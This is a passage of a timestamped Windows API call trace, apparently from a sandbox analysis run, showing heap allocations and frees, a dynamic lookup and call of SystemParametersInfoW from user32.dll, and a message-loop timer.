[0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0318.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0318.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0318.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0318.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0318.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0318.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0318.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0318.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0318.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0318.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0318.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0318.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0318.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0318.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0318.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0318.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0318.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0318.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0318.309] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0318.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0318.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0318.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0318.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0318.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0318.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0318.310] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0318.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0318.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0318.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0318.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0318.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0318.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.311] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0318.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0318.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0318.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0318.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0318.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0318.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0318.438] FreeLibrary (hLibModule=0x74f40000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0318.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0318.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0318.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0318.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0318.440] TranslateMessage (lpMsg=0x8bf710) returned 0 [0318.440] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0318.440] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0318.440] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0318.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0318.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0318.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0318.440] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0318.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0318.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0318.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0318.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0318.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0318.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0318.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree 